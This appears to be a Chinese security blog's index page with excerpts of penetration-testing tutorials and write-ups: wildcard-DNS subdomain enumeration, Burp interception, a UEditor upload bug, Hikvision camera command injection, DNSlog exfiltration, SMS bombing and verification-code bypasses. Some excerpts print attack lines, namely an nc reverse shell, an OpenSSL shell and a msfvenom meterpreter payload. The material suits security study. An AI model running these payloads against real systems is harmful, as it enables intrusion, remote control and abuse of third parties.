wolke

字节跳动——渗透测试实习生面试题：信息收集如何处理子域名爆破的泛解析问题？ 一、什么是域名泛解析   利用通配符* （星号）来做次级域名以实现所有的次级域名均指向同一IP地址。在域名前添加任何子域名，均可访问到所指向的IP地址。 常规域名解析www.wolke.cn 10.10.10.10域名泛解析*.wolke.cn 10.10.10.10访问子域名a.wolke.cn，b.wolke.cn等均指向10.10.10.10   这为我们去做子域名爆破带来了极大的不便，以前子域名爆破常用的是layer子域名挖掘机。不过layer子域名挖掘机在跑具有泛解析的站的时候，就不是那么适用 二、域名泛解析对抗   这里以淘宝和百度为例子：ping一个绝对随机不可能存在的域名，它解析了，那么说明它大概率使用了泛解析   淘宝可能存在域名泛解析👇   百度可能不存在域名泛解析👇   针对百度，我们可以直接使用layer子域名挖掘机等子域名爆破工具，而针对淘宝的资 ...

0bf017797d2d5c8d2bf1ab012f6cdb18cd44ee8d61e5cd52c15ed0079fa5367fd01fad4e816bdefcc376f9b98e2e2200cc517b721edcb9ecd9b72babcf7e6736144fe0d6277cbef68d981ed15806c0c1a6d7c26337159e2552e45ce333bbc60cb23399322993cd5d4d8196d945f68d8bb06bfdee6e3cbad61028a53e36a79a88184dd5027876ef0ffdd05128f3c43616d2b63d37e0e8abce9b2424c372028e050087991cd60bd9f1734a67c07b8b100b5eea1bbaa6f22496b3d6218e29314782dade35dd694b961772df8fd1eaed6a2f7ae6dc5cc0cb47f75c7979f9a38b57b2478c794c942963c712d24cfbbb4c269d923eab06b119e0986 ...

今天想用burp对PC的微信小程序进行渗透测试，发现怎么抓也抓不到，明明之前可以抓的，经过几小时的研究和资料搜集，终于解决。顺手把如何对手机/模拟器进行抓包也写了下，在文末我会提到是如何解决这个头疼且深刻的问题，这个问题我相信大家应该都会有，希望能帮助到大家。 一、抓手机/模拟器的微信公众号、小程序、APP前提：保证电脑和手机在同一局域网 （1）初阶电脑端使用ipconfig查看当前IP地址 手机端打开WLAN设置，手动指定代理，代理IP地址为电脑端的IP地址例如上面的192.168.43.170，端口设置为例如8081 此时打开burp，设置监听（非本地回环地址） 此时，burp就能抓手机访问网页的包了。 但是对于一些HTTPS的站点，手机访问会弹出警告——证书不受信任 点击确定继续后，burp才可以抓到该数据包 （2）进阶上面的方法很快就能用手机进行渗透测试，但是有一个问题：对HTTPS站点的渗透很繁琐甚至无效，以及对微信公众号(抓不全)和小程序会出现抓不到包、无法抓取app的情况。在手机导入一个burp证书即可 手机设置好代理后，访问http://burp 下载证书，下 ...

一、漏洞描述UEditor是一款所见即所得的开源富文本编辑器，具有轻量、可定制、用户体验优秀等特点，被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本，其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞，黑客利用此漏洞可以在服务器上执行任意指令，综合评级高危。 二、影响范围该漏洞影响UEditor的.Net版本，其它语言版本暂时未受影响。 三、漏洞原理漏洞的成因是在获取图片资源时仅检查了Content-Type，导致可以绕过达到任意文件上传。具体的漏洞分析可参考：https://www.freebuf.com/vuls/181814.html 四、漏洞复现1、环境部署准备一台Windows Server服务器，我用的是Windows 2008 Server。 没有安装.NET Framework 4.0的要先安装：http://www.microsoft.com/zh-cn/download/details.aspx?id=17718 安装完 .NET Framework 4.0 后，还需要向 IIS 注册应用程序池，注册的方法 ...

一、前言作为HW2022的防守方，发现一IP频繁对我方资产进行扫描，遂进行溯源 二、漏洞概述攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备，即使设备的所有者受限于有限的受保护 shell（psh）。除了入侵 IP 摄像头外，还可以访问和攻击内部网络。 该漏洞的利用并不需要用户交互，攻击者只需要访问 http 或 HTTPS 服务器端口（80/443）即可利用该漏洞，无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。 三、溯源过程定位攻击IP与搜索威胁情报，发现是恶意IP Fofa空间搜索引擎发现该IP开放了82端口 访问发现是HIKVISION的登录界面 漏洞点位于：/SDK/webLanguage，利用PUT方法上传xml数据： <?xml version='1.0' encoding='utf-8'?><language>$(Command > webLib/x)</language> 再去请求路径：/x，发现命令已经执行成功 使用EXP成功拿下该摄 ...

一、DNSlog简介在某些情况下，无法利用漏洞获得回显。但是，如果目标可以发送DNS请求，则可以通过DNS log方式将想获得的数据外带出来（oob）。 DNS log常用于以下情况： SQL盲注 无回显的命令执行 无回显的SSRF 二、搭建DNS log平台1、前期准备一台VPS 1.x.x.x 一个域名 wolke.cn 在wolke.cn中添加添加一个A记录与一个NS记录。其中A记录指向服务器IP地址，NS记录指向A记录的域名地址 2、项目部署参考开源项目DNSlog-GO：https://github.com/lanyi1998/DNSlog-GO 该项目是由GO语言编写的,所以部署的时候需要用到GO语言的环境 DNS使用的是53（UDP）端口，记得53端口的放行 配置文件config.yaml的修改（我这里HTTP采用的是8000端口，也记得要放行） 启动 3、测试访问http://ip:8000 需要输入token，这里的token就是config.yaml设置的值 点击复制随机子域名获取到 8xek8.dnslog.wolke. ...

最近看到十二师傅写了篇关于验证码漏洞的文章，觉得总结得很好，也学到了一些新思路，让我受益匪浅，原文链接： https://www.yuque.com/shier-mfbht/qh4bgb/zcee3k 一、短信轰炸这类漏洞存在的原因是没有对短信验证码的发送时间、用户及其IP作一些限制。 1、正常的短信轰炸 burp一直发包即可 2、并发绕过做了限制咋办？可以试试并发(万物皆可并发) 使用turbo intruder插件进行并发。 并发次数越大是不是轰炸就越多 3、删除Cookie绕过 可以尝试把cookie删掉，有些开发就可能根据cookie判断验证码是否获取过 4、特殊格式绕过 手机号码前后加空格，86，086，0086，+86，0，00，/r,/n, 以及特殊符号等 修改cookie，变量，返回 138888888889 12位经过短信网关取前11位，导致短信轰炸 进行能解析的编码。 二、暴力破解（任意用户登录注册）服务端未对验证时间、次数作出限制，存在爆破的可能性。简单的系统存在可以直接爆破的可能性，但做过一些防护的系统还得进行一些绕过才能进行爆破。 ...

  我的网站最近都没有更新什么文章了，语雀上也没有更新太多学习笔记。这两个月，一个字总结就是——忙。发生了很多不一样的事，也有很多不一样的收获。记录下最近在忙些什么吧。 半个项目经理 离沪返乡——中转站 曲折的返校之旅——终点站 新的开始——始发站 收获与思考 一、半个项目经理  5月初，项目经理安排了一个项目给我，让我当半个“项目经理”，负责整理师傅们的测试报告和对接客户，大概流程就是师傅们将测试报告发给我，我根据漏洞所属资产划分的对应部门，将报告发给客户那边的部门，跟踪漏洞录入情况。   自从负责这个项目后，客户那边所有的疑问和需求都会来问我，各种群和好友也多了起来，经常会打电话过来，比如：“这个漏洞怎么修复？”、“这个漏洞能不能算作误报”、”这个漏洞李老师能不能沟通下将修复时间推迟，现在来不及修复”、”这个漏洞李老师你复测下”，明显比以前就忙了很多，而且时间也不确定，完全看客户那边什么时候提出需求和回应，我这里就需要立马回答和跟进。   这个项目我一直负责到我6月底提出离职，刚好这个项目也接近尾 ...

一、前言在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell，这里列出了使用各种语言进行反弹 shell 的方法，我发现这种反弹 shell 方式都有一个缺点，那就是所有的流量都是明文传输的。 我们使用 nc 反弹 shell 进行测试 Kali: nc -lvp 4444Win7: nc 192.168.1.6 4444 -e cmd 使用 wireshark 可以直接看到我们执行的命令和返回信息 在这种情况下当我们进行操作时，网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止，因此需要对通信内容进行混淆或加密，这时可以选择使用 OpenSSL 反弹一个加密 shell。 二、OpenSSL简介在计算机网络上，OpenSSL 是一个开放源代码的软件库包，应用程序可以使用这个包来进行安全通信，避免窃听，同时确认另一端连接者的身份 利用 OpenSSL 反弹 shell 之前需要生成自签名证书 三、使用OpenSSL生成自签名证书openssl req -x509 -newkey rsa:2048 -keyout key.pem -o ...

一、网络拓扑图假如我们拿到了一台主机比如Win2008的shell，如何通过该主机进行内网渗透，拿到比如下图中数据服务器的最高权限？ 二、Win2008主机上线msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exemsfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.196ser lport 4444exploit 三、简单信息收集信息收集之前可以输入help了解一下meterpreter下的命令，其中有信息收集，提权等多个模块，自行了解 （1）查看目标主机当前用户与权限meterpreter > getuid （2）查看目标主机系统相关信息meterpreter> sysinfo （3）查看目标主机路由表meterpreter > route （4） ...